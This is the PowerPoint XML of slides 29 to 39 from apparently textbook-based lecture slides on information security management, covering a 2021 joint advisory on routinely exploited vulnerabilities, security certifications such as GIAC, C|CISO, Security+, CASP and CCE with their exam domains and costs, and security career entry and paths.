          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9852FBC-071F-4371-8B54-831A6B0B0E77}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118535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7524-0577-4ACB-93F0-5735D5E9AE17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alert (AA22-117A)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2021 Top Routinely Exploited Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A9F7B4F-64B9-45DF-B107-6FB7DD7A32A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This joint Cybersecurity Advisory (CSA) was coauthored by cybersecurity authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom: the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NZ NCSC), and United Kingdom’s National Cyber Security Centre (NCSC-UK). This advisory provides details on the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1924181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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GIAC Certifications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28676" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600200"/>
            <a:ext cx="8229600" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The System Administration, Networking and Security Organization (SANS) has developed a series of technical security certifications known as the Global Information Assurance Certification (GIAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The organization now classifies its training branch as SANS and certification branch as GIAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The GIAC certifications can be pursued independently or combined to earn a comprehensive certification called GIAC Security Engineer (GSE) and enhanced at “Gold” or “Expert” status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With the introduction of the GIAC Security Leadership Certification (GSLC), the GIAC Information Security Professional (GISP) and the GIAC Certified Project Manager Certification (GCPM) SANS now offers more than just technical certifications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6880845-11BB-4443-858C-3E06B40D64AB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="620450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EC-Council Certifications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EC-Council’s C|CISO tests not only security domain knowledge but also executive business management knowledge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The C|CISO domains include the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain 1: Governance (Policy, Legal, and Compliance)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain 2: IS Management Controls and Auditing Management </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain 3: Management - Project and Operations (Projects, Technology, and Operations)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain 4: Information Security Core Competencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain 5: Strategic Planning and Finance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B35ACD77-6CE1-4D68-A32D-ED77FA246E4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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t>Management of Information Security, 5th Edition, © Cengage Learning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1670894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CompTIA Certifications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Computing Technology Industry Association (CompTIA)—the organization that offered the first vendor-neutral professional IT certifications, the A+ series—now offers several security-related certifications:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mobile App Security+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CompTIA Advanced Security Practitioner (CASP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B35ACD77-6CE1-4D68-A32D-ED77FA246E4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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t>Management of Information Security, 5th Edition, © Cengage Learning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239988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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CompTIA Advanced Security Practitioner (CASP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26629" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600201"/>
            <a:ext cx="8534400" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CompTIA Advanced Security Practitioner is the organization’s newest Mastery-level certification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The exam covers industry-wide topics including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1.0 Enterprise security 30%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.0 Risk management and incident response 20%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3.0 Research and analysis 18%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4.0 Integration of computing, communications, and business disciplines 16%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5.0 Technical integration of enterprise components 16%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F61E30B7-8F7B-4375-94C5-BBF6C4844462}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3250894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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security +</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26629" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CompTIA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Security+ certification tests for security knowledge mastery of an individual with two years of on-the-job networking experience, with emphasis on security </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The exam covers industry-wide topics including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1.0 Network security 20%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.0 Compliance and operational security 18%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3.0 Threats and vulnerabilities 20%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4.0 Application, data, and host security 15%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5.0 Access control and identity management 15%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6.0 Cryptography 12%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F61E30B7-8F7B-4375-94C5-BBF6C4844462}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4266112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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ISFCE Certifications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31749" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600200"/>
            <a:ext cx="8229600" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Certified Computer Examiner (CCE)® certification is a computer forensics certification provided by the International Society of Forensic Computer Examiners covering:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ethics and law 5%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hardware 5%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Networks 5%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operating systems/file systems 20%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preparation 5%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Acquisition 10%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication 5%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analysis (primarily NTFS) 25%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presentation/reporting 15%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Media geometry 5%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{58BAC00E-CF05-4B05-A9A2-7E847D8AD29D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3156090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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Certification Costs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32772" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600200"/>
            <a:ext cx="8229600" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certifications cost money, and the more preferred certifications can be expensive </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Given the nature of the knowledge needed to pass the examinations, most experienced professionals find it difficult to do well without at least some review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certifications are designed to recognize experts in their respective fields, and the cost of certification deters those who might otherwise take the exam just to see if they can pass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most examinations require between two and three years of work experience, and they are often structured to reward candidates who have significant hands-on experience</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8F5D520E-2BBF-40EF-B5ED-2DEDAFB8D490}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1125103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5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Preparing for Security Certification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{49F65EF4-F0F7-442B-A406-A7E904C1AB99}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2870937" y="1295400"/>
            <a:ext cx="6450127" cy="4797968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4052336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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Entering the Information Security Profession</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many information security professionals enter the field after having prior careers in law enforcement or the military, or careers in other IT areas, such as networking, programming, database administration, or systems administration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Organizations can foster greater professionalism in the information security discipline by clearly defining their expectations and establishing explicit position descriptions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{276D16A7-4C99-471F-B8D3-514C28B7F7FE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3004277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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information Security Career Paths</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2357BCB7-3BD5-42F0-844D-3D90904DDC50}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
